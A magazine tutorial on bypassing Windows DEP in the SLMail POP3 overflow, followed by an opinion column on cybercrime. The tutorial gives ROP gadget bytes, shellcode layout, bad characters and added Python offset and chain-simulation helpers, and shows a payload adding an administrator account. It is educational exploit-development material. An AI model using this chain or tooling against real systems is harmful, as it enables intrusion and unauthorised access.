marked executable. Before trying this, I highly suggest reading Skape 
and Skywing's article in Uninformed called Bypassing Windows 
Hardware-Enforced DEP. 

This is a great article and is invaluable. 
Skape and Skywing are amazing minds 
and are definitely superhumans in ASM. 



Background 

Let's start off with the basics of a stack-based 
overflow. These types of overflows are almost 
non-existent in the real world today and are 
about as easy as it gets. When a developer 
wrote a specific application, they allocated a 
certain number of characters for a specific field 
and did not do proper bounds checking on that 
field. 

The example we will be using is an easy 
stack-based vanilla overflow in an application 
called SLMAIL. Mati Aharoni from Offensive 
Security discovered the SLMAIL vulnerability back 
in 2004. This exploit takes advantage of an improper 
bounds check of the PASS field in the 
SLMAIL POP3 server (port 110). 

Let's dissect the actual exploit itself; navigate 
to: http://www.milw0rm.com/exploits/638. 

If you look at where the actual attack occurs, 
it occurs at the PASS field PLUS the buffer. The 
buffer consists of 4,654 As (\x41 triggers our 
overflow), an address to our shellcode, some 
NOPs and our shellcode. To back up a bit, the way 
this overflow works is by overwriting a specific 
register called EIP. EIP is the instruction 
pointer that tells the system where to go after it's 
finished with the current function. 

If we can control EIP, we can tell the system 
to go back to where our shellcode is; typically 
these addresses are (for example) CALL ESP or 



Figure 1. Running the exploit from *nix box 
JMP ESP. ESP points to the top of the 
current stack, which is where our 
shellcode lands. Looking at the exploit, 
we can see that 4654 A's are sent; the 
next value, 0x78396ddf, is a memory address 
that ends up overwriting EIP and jumps 
us right back to our shellcode. 

NOPs are represented by \x90 in x86 
machine code and stand for No Operation 
(noop). This means do nothing, and 
continue moving down the code until 
you hit a valid instruction. The technique 
of noops is used when you aren't 100 
percent certain where you're going to 
land, so you slide down until you hit your 
shellcode. This also helps to absorb any 
garbage characters that may be left over 
from the legitimate function. Once the 
noops are finished, the shellcode is 
executed, which carries our malicious 
payload, i.e. a reverse shell, bind shell, 
useradd, etc. 

So the entire point of this stack 
overflow is: overwrite EIP, jump back to 
our shellcode (JMP ESP), and execute 
the shellcode. If you look at the date 
and what the specific exploit was tested 
on, we see that the exploit was tested 
on Windows 2000, Service Pack 4. 
What would happen if you ran this exact 
exploit on Windows XP SP2, Windows 
2003 SP1, Windows 2003 SP2, and so 
on? 

We'll only talk about Windows 
2003 SP2 in this specific paper, since 
each OS, while of course different, is 
relatively similar. It is significantly easier 
to bypass DEP in Windows XP SP2 
and Windows 2003 SP1 than it is with 
Windows 2003 SP2 due to two checks 
being made in memory instead of one 
(CMP AL and EBP vs. EBP and ESI). 

Let's run this in a debugger. In this 
instance I'll be using Immunity Debugger. 
First we download the exploit from 
milw0rm and run it through the 
debugger, launching the exploit from our 
*nix box (see Figure 1). 

In our debugger, we get an access 
violation on the first instruction on our 
controlled stack (see Figure 2). 

Diving down further: by right clicking 
on My Computer, Properties, Advanced, 
under Performance Advanced, and 
Data Execution Prevention, we can see 
that Turn on DEP for all programs and 
services except those I select is set. This 
is problematic for us, as we want to 
exploit this system and gain access to 
it. 

Now that we know DEP is enabled, 
we need a way of disabling it so that 
our controllable stack is executable and 
our shellcode can function correctly. 
Fortunately for us, there is a way to 


[08:18:51] Access violation when executing [783D8DDF] - use Shift+F7/F8/F9 to pass exception to program 

Figure 2. Access violation 





7C83F517  C745 FC 02000000  MOV DWORD PTR SS:[EBP-4],2
7C83F51E  6A 04             PUSH 4
7C83F520  8D45 FC           LEA EAX,DWORD PTR SS:[EBP-4]
7C83F523  50                PUSH EAX
7C83F524  6A 22             PUSH 22
7C83F526  6A FF             PUSH -1
7C83F528  E8 1235FEFF       CALL ntdll.ZwSetInformationProcess

Figure 3. Starting the ZwSetInformationProcess 




804E 37 80      OR BYTE PTR DS:[ESI+37],80
5E              POP ESI
C9              LEAVE
C2 0400         RETN 4
64:A1 18000000  MOV EAX,DWORD PTR FS:[18]
8B40 30         MOV EAX,DWORD PTR DS:[EAX+30]
8B78 0C         MOV EDI,DWORD PTR DS:[EAX+C]

Figure 4. ZwSetInformationProcess 



EAX 00000000
ECX 01F39EF4 ASCII "09/06/08 08:36:36 P3-0001: Illegal command..."
EDX 000003CA
EBX 00000004
ESP 01F3A158
EBP 41414141
ESI 00000000
EDI 00000001
EIP 7C93C899 SHELL32.7C93C899

Figure 5. Registers 



7C93C899  54       PUSH ESP
7C93C89A  5D       POP EBP
7C93C89B  C2 0400  RETN 4

Figure 6. EBP 



Registers (FPU)

ECX 01F39EF4 ASCII "09/06/08 08:36:36 P3-0001: Illegal command..."
EDX 000003CA
EBX 00000004
ESP 01F3A154
EBP 41414141
ESI 00000000
EDI 00000001
EIP 7C93C89A SHELL32.7C93C89A

Figure 7. ESP 
do this. In this specific exploit, I figured 
using a standard stack overflow would 
be super-simple to do; however, it proved 
a lot more difficult than I could have 
imagined. To start off and repeat a little 
of Skape and Skywing's information: in 
order to bypass DEP you have to call a 
function called ZwSetInformationProcess 
(in the routine LdrpCheckNXCompatibility). 

When this function is called, you 
must have certain things already 
set up in order for it to disable DEP and 
ultimately jump us back to our controlled 
stack. Let's take a look at the actual 
function first before we start diving into 
it. We'll head off to NTDLL and look 
at address 0x7C83F517. This starts the 
ZwSetInformationProcess sequence and is 
our beginning point for disabling DEP (see 
Figure 3). 

Looking at the specific instructions, the 
first thing it does is MOV DWORD 
PTR SS:[EBP-4],2. It is specifically 
trying to WRITE something to a specific 
memory address. If our registers are 
not properly set up, this will fail and an 
exception will be thrown similar to the 
one we saw earlier. Next it pushes the 
value 4 to the stack, pushes EAX (the 
address of that dword) to the stack, pushes 
22 to the stack (the ProcessExecuteFlags 
information class), pushes -1 (the current 
process handle) to the stack, and ultimately 
calls the ZwSetInformationProcess function. 

Let's continue on after the call. It will do 
some magic, and ultimately come here 
(see Figure 4). 

We now see that it does the same 
thing for ESI, so again ESI must be 
a writeable memory address for it not to 
bomb out. We now know that we need the 
registers EBP and ESI to point to writeable 
memory addresses somehow in order 
for the rest of this to work. Let's first take 
the vanilla SLMail exploit that does not 
bypass DEP and work it into something 
that will fully bypass NX. One thing to 
be aware of here is the LEAVE instruction. 
This will more or less take the value of EBP 
and make it ESP. This is problematic 
if we have EBP pointing to our HEAP. 
So we need to get it somewhere near 
our controllable stack if we want code 
execution. 

Let's take a look at our registers at the 
time of the overflow to see what we have 
to work with (see Figure 5). 

Looking at our registers, it looks 
like ECX points to the HEAP, which can 
be beneficial for us, as it is writeable. 
If we want to get crazy with it, we could 
possibly just do a heap spray. But let's 
be more creative. We see that the only 
really good register we can use is ESP 
and possibly ECX. ESP points pretty 
close to where our shellcode is, and ECX 



01F3A154  01F3A158
01F3A158  7C806B03  ntdll.7C806B03
01F3A15C  7C85E6F7  RETURN to ntdll.7C85E6F7
01F3A160  7C8043A3  ntdll.7C8043A3
01F3A164  7C934F57  RETURN to SHELL32.7C934F57
01F3A168  7C8F7495  SHELL32.7C8F7495
01F3A16C  7C83F517  ntdll.7C83F517

Figure 8. ESP 



Registers (FPU)

EAX 00000000
ECX 01F39EF4 ASCII "09/06/08 08:36:36 P3-0001: Illegal command..."
EDX 000003CA
EBX 00000004
ESP 01F3A158
EBP 01F3A158
ESI 00000000
EDI 00000001
EIP 7C93C89B SHELL32.7C93C89B

Figure 9. Registers (FPU) 



Registers (FPU)

ECX 01F39EF4 ASCII "09/06/08 08:36:36 P3-0001: Illegal command..."
EDX 000003CA
EBX 7C8043A3 ntdll.7C8043A3
ESP 01F3A164
EBP 01F3A158
ESI 00000000
EDI 00000001
EIP 7C806B04 ntdll.7C806B04

C 0   ES 0023 32bit 0(FFFFFFFF)
P 1   CS 001B 32bit 0(FFFFFFFF)

Figure 10. Registers (FPU) 



EAX 00000000
ECX 01F39EF4 ASCII "09/06/08 08:36:36 P3-0001: Illegal command..."
EDX 000003CA
EBX 7C8043A3 ntdll.7C8043A3
ESP 01F3A16C
EBP 01F3A158
ESI 01F39EF4 ASCII "09/06/08 08:36:36 P3-0001: Illegal command..."
EDI 7C934F5A SHELL32.7C934F5A
EIP 7C8F7495 SHELL32.7C8F7495

Figure 11. Registers (FPU) 



7C83F517  C745 FC 02000000  MOV DWORD PTR SS:[EBP-4],2
7C83F51E  6A 04             PUSH 4
7C83F520  8D45 FC           LEA EAX,DWORD PTR SS:[EBP-4]
7C83F523  50                PUSH EAX
7C83F524  6A 22             PUSH 22
7C83F526  6A FF             PUSH -1
7C83F528  E8 1285FEFF       CALL ntdll.ZwSetInformationProcess

Figure 12. Data execution prevention 



66 HAKIN9 2/2010 






somewhere in memory. Remember we 
need EBP and ESI to point to writeable 
memory addresses in order for us to 
disable NX. So let's tackle EBP first. We 
find a convenient PUSH ESP POP EBP 
RETN0x4 in SHELL32 at memory address 
0x7C93c899 (see Figure 6). 

Once this executes, it will push the value of ESP onto our stack (see Figure 7). Our ESP is 01F3A154, so let's check what got pushed onto our stack (see Figure 8). 

The stack slot at 01F3A154 now holds our saved ESP, great! Now we need to POP that value from the stack into EBP (see Figure 9). 

Now we have EBP pointing to our original ESP address, which is somewhere near our shellcode. Pretty easy so far... 

Next we need to get ESI pointing to somewhere that is writeable. A simple technique would have been a PUSH ESP, PUSH ESP, POP EBP, POP ESI, RETN or variations to that effect, but sifting through memory land, I wasn't able to find anything. At this point I got a little creative. 

We need to get ESI to a writeable memory address; either ESP or ECX will work from an address perspective. Let's take a look at the next series of commands here. Be sure to pay close attention, it can get confusing fast: 

In address space 0x7C806B03 is a POP EBX, RETN. This will take a memory address ALREADY on the stack and pop it into the EBX register. We arbitrarily insert our own address where we want it to eventually go. Take a look at the code: 

# POP EBX, RETN 0x7C806B03 @NTDLL 
disablenx+='\x03\x6B\x80\x7C' # 0x7C8043A3 will be EBX when POPped 
# This is needed for the NX bypass, so that ESI can be made writeable. 
# POP EDI, POP ESI, RETN 0x7C8043A3 @NTDLL 
disablenx+='\xA3\x43\x80\x7C' 

When I call the memory address 0x7C806B03 in NTDLL, it will POP 0x7C8043A3 as the value for EBX. So EBX now looks like this: see Figure 10. 

This still doesn't help us, as ESI is still a bogus address of 00000000. Our next command issued is this: 



# PUSH ECX, CALL EBX 0x7C934F57 @SHELL32 
disablenx+='\x57\x4F\x93\x7C' # This will go to EBX (0x7C8043A3) 

This command will PUSH ECX to the stack and CALL EBX. 

Remember, we set EBX one step before, and ECX already points at writeable memory. Once the value of ECX gets pushed, CALL EBX pushes its own return address and lands on the POP EDI, POP ESI, RETN. Why this is important: the POP EDI pops that return address off the stack. We don't care about EDI, but we need to remove one address from the stack in order for the correct value to be popped into ESI. The second instruction, POP ESI, then pops the value of ECX into the ESI register. Once this occurs we now have EBP and ESI pointing to writeable memory addresses (see Figure 11). 

Look at EBP: it's our original ESP (start point). Look at ESI: it now holds the value of ECX. Next we call our ZwSetInformationProcess to disable Data Execution Prevention. This is located at memory address 0x7C83F517 (see Figure 12). 



Figure 13. ESI (registers after the NX-off code returns): EAX C000000D, ECX 00000001, EDX FFFFFFFF, EBX 7C8043A3 ntdll.7C8043A3, ESP 01F3A164, EBP 7C83F52D ntdll.7C83F52D, ESI 90909090, EDI 7C934F5A SHELL32.7C934F5A, EIP FFFFFFFF 

Figure 14. Registers (FPU): the same state as Figure 13 (EIP FFFFFFFF, ESP 01F3A164, EBP 7C83F52D, ESI 90909090, EDI 7C934F5A) 

Figure 15. Let's look at the stack (dump at the point of Figure 14): 
  01F3A15C  FFFFFFFF 
  01F3A160  00000022 
  01F3A164  01F3A154 
  01F3A168  00000004 
  01F3A16C  90909090 
  01F3A170  90909090 
  01F3A174  90909090 
  01F3A178  90909090 
  01F3A17C  90909090 
  01F3A180  90909090 
  01F3A184  90909090 

Figure 16. Memory address 7C85E6F7 in ntdll: 
  7C85E6F7  83C4 20  ADD ESP,20 
  7C85E6FA  5E       POP ESI 
  7C85E6FB  5D       POP EBP 
  7C85E6FC  C2 0400  RETN 4 

Figure 17. Memory address of the JMP ESP gadget in ntdll (address read from the scan as 7C86A81B): FFE4 JMP ESP 

Figure 18. Shellcode (stack from 01F3A194): a NOP sled (90 NOP, 01F3A194 to 01F3A1C1) followed by the decoder stub at 01F3A1C2: SUB ECX,ECX; SUB ECX,-36; FLDZ; FSTENV (28-BYTE) PTR SS:[ESP-C]; POP EBX; XOR DWORD PTR DS:[EBX+13],... (key illegible in the scan); SUB EBX,-4; LOOP SHORT 01F3A1CE. The FLDZ/FSTENV pair fetches EIP into EBX; the loop then XOR-decodes the encoded payload in place. 

Figure 19. Modified shellcode: C:\WINDOWS\system32\cmd.exe, "net user" on SSHACKTHISBOX-0 before the payload lists Administrator, ASPNET, Guest, IUSR_SSHACKTHISBOX-0, IWAM_SSHACKTHISBOX-0 and SUPPORT_388945a0; "The command completed successfully." 

Here we go through the check to see if EBP is writeable. It is, so execution continues on to get the parameters set up properly for the CALL to ZwSetInformationProcess. Once we go through that, it does some magic, and then we are at the check on ESI (see Figure 13). One thing worth checking at this point: EAX reads C000000D in Figures 13 and 14, which is STATUS_INVALID_PARAMETER. If that is the NTSTATUS ZwSetInformationProcess returned, the execute flags were not changed; so read the return value right after the CALL (0 is STATUS_SUCCESS) rather than inferring that DEP is off from the payload running later. 



It checks ESI, it's writeable, POPs ESI, moves the value of EBP to ESP and RETNs. We should be good to go, right? We just have to find where in our shellcode we land, put in an address to JMP ESP and we are all set. Wait a minute... Look where it placed us (see Figure 14). 

Notice where EIP points to: FFFFFFFF. 

That's not an address we can use... Let's look at the stack (see Figure 15). Figure 15 also shows why: the PUSH -1 from Figure 12 (the process handle argument) landed at 01F3A15C, which is EBP+4, and the LEAVE / RETN 4 at the end of that routine returns through exactly that slot. 

So close! We are 5 addresses away from our user-controlled stack. Due to the way ZwSetInformationProcess handles the pushes, pops, and others, it leaves remnants on the stack and we can't quite get to our shellcode. This was frustrating for me, as I probably spent 2 days getting up to this point finding the right calls, only to see myself almost to the shellcode, but not close enough. About 8 hours later, an inordinate amount of Jolt cola, and a loving wife that was ceasing to be loving, I came up with an idea. I can't control these addresses, but I can control addresses before it. If I could somehow return to a previous value that was ignored and have that call place me in the right memory space, I might be able to get into my stack and get my shellcode. Let's take a peek back at my original code: 

# 0x7C93C899 @SHELL32 PUSH ESP, POP EBP, RETN 0x4 
disablenx='\x99\xC8\x93\x7C' # Get EBP close to our controlled stack 
# POP EBX, RETN 0x7C806B03 @NTDLL 
disablenx+='\x03\x6B\x80\x7C' # 0x7C8043A3 will be EBX when POPped 

Notice the RETN 0x4 in the first call. This will return us to the POP EBX, RETN in the next instruction, but skip the 4 bytes after it. Typically these are filled with (for example) \xff\xff\xff\xff; instead we're going to put in our own address that fixes the registers for us. Let's put this all together: 

disablenx='\x99\xC8\x93\x7C' # Get EBP close to our controlled stack 
disablenx+='\x03\x6B\x80\x7C' # 0x7C8043A3 will be EBX when POPped 
disablenx+='\xFF\xFF\xFF\xFF' # JUNK 
So the system will go to memory address 0x7C93C899, then to 0x7C806B03, then ignore the \xff\xff\xff\xff and continue on. What if it were possible that once we disabled DEP we could somehow get back to the \xff\xff\xff\xff slot, which would really be an address that corrects ESP and pops a couple of things off the stack to land us in our shellcode? Here's how we do it. 

Remember when we went here: 

# PUSH ECX, CALL EBX 0x7C934F57 @SHELL32 
disablenx+='\x57\x4F\x93\x7C' # This will go to EBX (0x7C8043A3) 

This would push ECX to the stack, call EBX, then pop ESI to the right value in a writeable memory address. After that it would go straight to our ZwSetInformationProcess function that disables DEP for us. Instead of jumping to ZwSetInformationProcess, we go to a RETN 0x10, and then go to ZwSetInformationProcess. Let's take a quick look: 

# RETN 0x10 0x7C8F7495 @SHELL32 
disablenx+='\x95\x74\x8F\x7C' # Stack alignment 

This will issue a RETN 0x10. We immediately call ZwSetInformationProcess; it does its magic, it checks EBP, then checks ESI, then LEAVE, then RETN 0x4. It now places us a few instructions behind the original one we had issues with: this is our \xff\xff\xff\xff. The RETN 0x10 matters because it discards 16 bytes of stack before the call site's PUSHes run, so the four arguments and the return address no longer land on the slot at EBP+4 that the final RETN 4 returns through (compare Figure 15, where the PUSH -1 had put FFFFFFFF exactly there). We replace the \xff\xff\xff\xff with a memory address of 0x7C85E6F7 in ntdll. This memory address looks like this (see Figure 16). 

This will ADD ESP,0x20 (eight dwords), POP two registers, then RETN 4; this lands us directly in our controlled stack where our shellcode is. One last problem, which is easy: we have to find exactly where it lands us so we can put a memory address for JMP ESP or CALL ESP there. This is easy with Metasploit; you simply go to the tools section and use the pattern_create and pattern_offset tools to find exactly where you land. Use that to put in a memory address that does JMP ESP (see Figure 17). 

Once we jump here, look where we land (see Figure 18). 

We land right where we want, on a NOP sled, and ultimately in our shellcode. I modified the shellcode a bit in the SLMail exploit to just add a user account called relik. I also found that 0xff, 0x00, and 0x0a are restricted characters. Let's take a peek before and after (see Figure 19). 
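The pattern_create / pattern_offset step and the bad-character finding above, as an added example (my code, not the article's and not Metasploit's): a re-implementation of Metasploit's cyclic pattern and offset lookup, a helper that turns the dword left in EIP after the ADD ESP,20 / POP / POP / RETN 4 gadget into the two offsets that matter (the slot for the JMP ESP address and, 8 bytes later, the shellcode), and a check for the 0x00, 0x0a and 0xff bytes SLMail refuses. The crash values in the docstrings and test are constructed for the demonstration, not taken from the exploit.

```python
# Added example (not the article's or Metasploit's code): Metasploit-style cyclic
# pattern, offset lookup, the placement rule after a RETN 4, and a bad-byte check.
import itertools
import string
import struct

PATTERN_MAX = 26 * 26 * 10 * 3   # 20280 bytes before Metasploit's pattern repeats


def pattern_create(length):
    """Cyclic pattern Aa0Aa1...Aa9Ab0... of `length` bytes (capped at PATTERN_MAX)."""
    triplets = itertools.product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    out = bytearray()
    for triplet in triplets:
        out += "".join(triplet).encode("ascii")
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(value, length=PATTERN_MAX):
    """Offset of a crash value in the pattern, or -1 if it is not there.
    `value` is the dword shown in a register (int, little-endian as it sat in memory,
    e.g. EIP 0x37634136 is the bytes b'6Ac7') or the raw 4 bytes / 4 characters."""
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    elif isinstance(value, str):
        needle = value.encode("ascii")
    else:
        needle = bytes(value)
    return pattern_create(length).find(needle)


def payload_layout(eip_after_chain, length=PATTERN_MAX):
    """Where things go once the chain has been run with a pattern behind it: the
    pattern dword in EIP is the slot the final RETN 4 popped, so that offset takes the
    JMP ESP address; RETN 4 discards one more dword, so ESP (and the shellcode) sits
    8 bytes further on. Offsets are relative to the start of the pattern."""
    off = pattern_offset(eip_after_chain, length)
    if off < 0:
        raise ValueError("EIP value not in pattern: wrong endianness or not attacker-controlled")
    return {"jmp_esp": off, "shellcode": off + 8}


def bad_char_offsets(payload, bad=(0x00, 0x0A, 0xFF)):
    """Offsets of bytes the target will not accept (the article found 0x00, 0x0a, 0xff)."""
    return [i for i, b in enumerate(payload) if b in bad]
```

Send the chain followed by pattern_create(1024) once, read EIP from the debugger, and payload_layout(EIP) gives the two offsets; run bad_char_offsets over the finished buffer before sending it, since a single 0x00, 0x0a or 0xff in a gadget address truncates or corrupts the chain.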

Note the user accounts, then let's send our payload (see Figure 20). 

The payload is sent. Let's recheck our user accounts (see Figure 21). 

A local administrator account called relik has been added, simply awesome. 
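The whole chain as it is pieced together above, replayed as an added example (my code, not the article's): a toy x86 stack-machine with one function per gadget. It reproduces the register states of Figures 9 to 11, the dead end of Figures 13 to 15 (EIP FFFFFFFF, because the PUSH -1 from Figure 12 lands on the slot the final RETN 4 returns through) and the landing on the NOP sled at 01F3A194 once the RETN 0x10 and the 0x7C85E6F7 gadget are in place. Assumptions: the ntdll code after the CALL ZwSetInformationProcess is modelled as the POP ESI / LEAVE / RETN 4 sequence the text describes, not disassembled; the syscall is a stub that only records whether it was asked to turn execute protection off (its NTSTATUS is the stub's own; the real one in Figures 13 and 14 reads C000000D); the JMP ESP address is read from the faint Figure 17; the filler dwords and the NOP sled are constructed.

```python
# Added example (not the article's code): replay the SLMail DEP-bypass chain on a
# toy x86 stack-machine. Gadget semantics follow the article; the ntdll code after
# CALL ZwSetInformationProcess is modelled from the text. Addresses are labels only.
CHAIN_BASE = 0x01F3A154            # chain start on the stack (Figure 8)
ECX_AT_CRASH = 0x01F39EF4          # ECX when the overflow fires (Figure 9)
RET_AFTER_CALL_EBX = 0x7C934F5A    # PUSH ECX (1 byte) + CALL EBX (2 bytes) after 0x7C934F57
RET_AFTER_CALL_ZWSIP = 0x7C83F52D  # return address of the CALL at 0x7C83F528
JMP_ESP = 0x7C86A81B               # FFE4 JMP ESP, as read from Figure 17 (faint scan)
NOP, FILL = 0x90909090, 0x41414141 # NOP sled dwords; constructed filler for unread slots


class Cpu:
    def __init__(self, chain, ecx):
        self.mem = {CHAIN_BASE + 4 * i: d for i, d in enumerate(chain)}
        self.esp, self.ecx = CHAIN_BASE, ecx
        self.eax = self.ebx = self.ebp = self.esi = self.edi = self.eip = 0
        self.nx_disabled, self.trace = False, []

    def push(self, v):
        self.esp -= 4
        self.mem[self.esp] = v & 0xFFFFFFFF

    def pop(self):
        v = self.mem[self.esp]
        self.esp += 4
        return v

    def ret(self, n=0):                # RETN n: pop EIP, then drop n more bytes
        self.eip = self.pop()
        self.esp += n


def zw_set_information_process(cpu):
    """Stub for the stdcall syscall: only the DEP-off request (-1, 0x22, &2, 4) succeeds."""
    handle, cls, ptr, length = (cpu.mem[cpu.esp + 4 * i] for i in range(1, 5))
    ok = handle == 0xFFFFFFFF and cls == 0x22 and length == 4 and cpu.mem.get(ptr) == 2
    cpu.nx_disabled, cpu.eax = ok, 0 if ok else 0xC000000D   # STATUS_INVALID_PARAMETER
    cpu.ret(0x10)


def push_esp_pop_ebp_retn4(cpu):       # 0x7C93C899 @SHELL32
    cpu.push(cpu.esp)                  # PUSH ESP stores the pre-push value
    cpu.ebp = cpu.pop()                # EBP := address of the next chain slot
    cpu.ret(4)                         # skip the 'junk' dword after the next gadget

def pop_ebx_retn(cpu):                 # 0x7C806B03 @ntdll
    cpu.ebx = cpu.pop()
    cpu.ret()

def pop_edi_pop_esi_retn(cpu):         # 0x7C8043A3 @ntdll, reached through CALL EBX
    cpu.edi = cpu.pop()                # swallows the return address CALL EBX pushed
    cpu.esi = cpu.pop()                # takes the ECX value pushed just before
    cpu.ret()

def push_ecx_call_ebx(cpu):            # 0x7C934F57 @SHELL32
    cpu.push(cpu.ecx)
    cpu.push(RET_AFTER_CALL_EBX)
    cpu.eip = cpu.ebx

def disable_nx(cpu):                   # 0x7C83F517 @ntdll (Figure 12) plus the epilogue
    cpu.mem[cpu.ebp - 4] = 2           # MOV DWORD PTR SS:[EBP-4],2: EBP must be writeable
    for arg in (4, cpu.ebp - 4, 0x22, 0xFFFFFFFF):   # PUSH 4; PUSH EAX(=EBP-4); PUSH 22; PUSH -1
        cpu.push(arg)
    cpu.push(RET_AFTER_CALL_ZWSIP)     # CALL ntdll.ZwSetInformationProcess
    zw_set_information_process(cpu)
    cpu.esi = cpu.pop()                # POP ESI (epilogue as the text describes it)
    cpu.esp = cpu.ebp                  # LEAVE: MOV ESP,EBP ...
    cpu.ebp = cpu.pop()                #        ... POP EBP
    cpu.ret(4)                         # RETN 4: returns through the slot at EBP+4

def add_esp_20_pop_pop_retn4(cpu):     # 0x7C85E6F7 @ntdll (Figure 16)
    cpu.esp += 0x20
    cpu.esi, cpu.ebp = cpu.pop(), cpu.pop()
    cpu.ret(4)

GADGETS = {0x7C93C899: push_esp_pop_ebp_retn4, 0x7C806B03: pop_ebx_retn,
           0x7C8043A3: pop_edi_pop_esi_retn, 0x7C934F57: push_ecx_call_ebx,
           0x7C8F7495: lambda cpu: cpu.ret(0x10),          # RETN 0x10 @SHELL32
           0x7C83F517: disable_nx, 0x7C85E6F7: add_esp_20_pop_pop_retn4,
           JMP_ESP: lambda cpu: setattr(cpu, "eip", cpu.esp)}


def first_chain():
    """First attempt: junk after the RETN 4, then straight into the NX-off code."""
    return [0x7C93C899, 0x7C806B03, 0xFFFFFFFF, 0x7C8043A3, 0x7C934F57, 0x7C83F517] + [NOP] * 8


def final_chain():
    """Working layout (Figure 8): junk slot reused, RETN 0x10 before the NX-off code,
    JMP ESP at byte 56 of the chain, shellcode (a NOP sled here) at byte 64."""
    return ([0x7C93C899, 0x7C806B03, 0x7C85E6F7, 0x7C8043A3, 0x7C934F57, 0x7C8F7495, 0x7C83F517]
            + [FILL] * 7 + [JMP_ESP, FILL] + [NOP] * 4)


def run(chain, ecx=ECX_AT_CRASH, stop_at=None):
    """Fire the chain; run gadgets until control leaves the modelled set or hits stop_at."""
    cpu = Cpu(chain, ecx)
    cpu.ret()                          # the overwritten return address pops the first gadget
    while cpu.eip in GADGETS and cpu.eip != stop_at:
        cpu.trace.append(cpu.eip)
        GADGETS[cpu.eip](cpu)
    return cpu
```

run(final_chain(), stop_at=0x7C8F7495) stops in the Figure 11 state (EBP 01F3A158, ESI = ECX, EDI 7C934F5A, ESP 01F3A16C); run(final_chain()) ends with EIP == ESP == 01F3A194, the first NOP. run(first_chain()) ends at EIP FFFFFFFF with ESP 01F3A164 and EBP 7C83F52D, the Figure 14 dead end, and the same happens if 0x7C85E6F7 in final_chain() is swapped back for 0xFFFFFFFF.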

This is a prime example of taking an exploit and using it to bypass data execution prevention. I would like to note that this isn't a problem with Microsoft in any way; they have chosen to allow backwards compatibility (as mentioned in Skape and Skywing's article). Interestingly enough, I really haven't seen something like this; most of the exploits out there with NX bypass already have ESI and EBP set up with minor modification. This is somewhat different as our registers aren't pointing anywhere useful. This should be somewhat universal if ECX and ESP are writeable memory addresses; it should take minor modification to get it to work with other exploits. 

Two caveats apply when porting it: the gadget addresses are tied to the exact ntdll and SHELL32 builds on the target (a different service pack or hotfix moves them), and the ZwSetInformationProcess trick only works while the loader still honours a per-process request to turn execute protection off; a process running with permanent DEP cannot be switched this way. 

Special thanks to Muts, Ryujin, John Melvin (whipsmack), and H.D. Moore, who have helped along the way. 

Remember to visit http://www.securestate.com for more of this fun stuff! 



Figure 20. Sending payload: a root shell in /home/relik/Desktop/nxbypass running "python slmail_nx_bypass.py", which prints "Sending happy NX Bypass Overflow..." 

Figure 21. Checking user accounts: "net user" on SSHACKTHISBOX-0 run before and after the payload (Administrator, ASPNET, Guest, IUSR_SSHACKTHISBOX-0, IWAM_SSHACKTHISBOX-0, SUPPORT_388945a0); the second listing includes the new account 
EMERGING THREATS 

We're losing to the bad guys. But it'll change, and here's how... 

MATTHEW JONKMAN 

Yes I said it. We're losing. And badly. Conservative estimates say that 5-20% of commercial computer networks are infected at this moment. I doubt any of us know a home user (other than fellow security professionals) that's not been infected before, or is as we speak and they're ignoring it because they don't know how to fix it. If a company has Windows workstations, one of them's been whacked recently for certain. 

If the general public truly understood how easy it is for a remote individual or group to target them and get their stuff, they'd be terrified. 

Even nation versus nation cyber capabilities exist and have been effectively exercised in recent conflicts. National cyber-defense is extremely difficult if not impossible against a well armed attacker. Many countries are building out or have very effective offensive capabilities, while most have minimal defensive capabilities. 

The major problem is that even the most basic cyber attack could cause a civilian panic that could cripple a modern country. All you need to do is scare your enemy's civilians a bit and they'll tear each other apart fighting over bottled water at the supermarket and pull every bit of cash out of the bank they can get. The nations that haven't built this offensive capability can easily hire it out from the underground, and what they can hire is far greater than most major powers can put together on their own! 

But back to individual and organizational vulnerability, there's not much we can do about it. Law enforcement in most countries is overwhelmed and in general not that enabled or funded to investigate or prosecute in remote countries. Even when we do get an extradition and conviction the bad guy is looking at 6 months in a minimum security prison (if any time at all), and then a good job at an AV company. So the way to stay safe is to not attack your fellow citizens; go international and you're fine. But even if you get caught and prosecuted it'll be alright, there's a good job waiting for you. 

The only time we see a bad guy suffering a consequence is when they cross their peers. Then it can get ugly. Many of them disappear, both electronically and often physically. Don't pay your debts in the underground on time, go into hiding. Whack an FBI website or a retailer's customer database, you're fine. 

I believe that at some point the world will lash out against the criminal underground. Their greed and methods are affecting too many people too deeply. When a population doesn't feel safe and doesn't believe their government can or will protect them they will band together to protect themselves. This process inevitably ends in violence. The kind of violence they make History Channel specials about. 

Here's how I think it might go... It starts with a political reaction to a major breach. A huge breach. Something like the US Social Security System losing its entire database, the FBI losing a core intelligence database, maybe even the NSA losing something big like a list of operatives, and very publicly. I know they've all lost things now and then, but I mean a big one, a complete database containing information about most everyone stolen. The big thing is that the bad guys, in the process of monetizing this data, are discovered. The world becomes suddenly aware of the scope of the breach, and realizes there's nothing they can do about it. 

There'll be a manhunt. The bad guys will be identified as a ring of folks from a country the Western world isn't friendly with, and maybe a couple of Westerners involved as well (probably Americans, we do stupid crap every day). The Americans involved will get their doors kicked in and get the maximum sentence for their minor involvement, which will probably be probation since they have no prior offenses and their mothers promise to ground them for a year with no TV. 

Laws will be changed to make consequences more dire for cyber crime. But the rest of the ring will remain free as we're unable to get extradition. These guys become local heroes for standing up to the big bad modern world and are protected. 

Western politicians will grandstand for months talking about how we need to go get these guys that clogged up the tubes of the Internet, or some other nonsensical analogy involving Osama bin Laden. They'll talk about how this is an attack against the fabric of society, how they're coming after your kids and your parents, and the people will rise up. The talk shows will be full of "I got my identity stolen, I think it was the same guys", or "My grandmother's credit card was used to buy porn in the Ukraine, it's got to be the SSN breach ringleaders." It won't be of course, but these guys will end up the scapegoats for every cybercrime and problem in the world. 

The US will lean heavily on its allies to bring UN action against this country, sanctions, maybe even a military action if they refuse to extradite. It'll go badly. We (the US) will handle the occupation badly, tick off all of our allies and potential allies, and set the world back a few steps in the process to peace. But that'll pass, the world will eventually forgive the US for acting rashly and arrogantly, and for that 'accidental' bomb on a 'random' embassy. (Sorry China, promise it won't happen again, really!). 

So here's where the solution comes in. The world will realize just how lawless and uncontrolled the Internet is, and just how much they rely on it functioning properly and their information remaining safe. They'll realize that most of the assets they own, their cash, retirement plans, credit cards, are just electrons arranged in a certain order on a hard drive somewhere. And that if those electrons are rearranged incorrectly all of their resources are suddenly gone. 

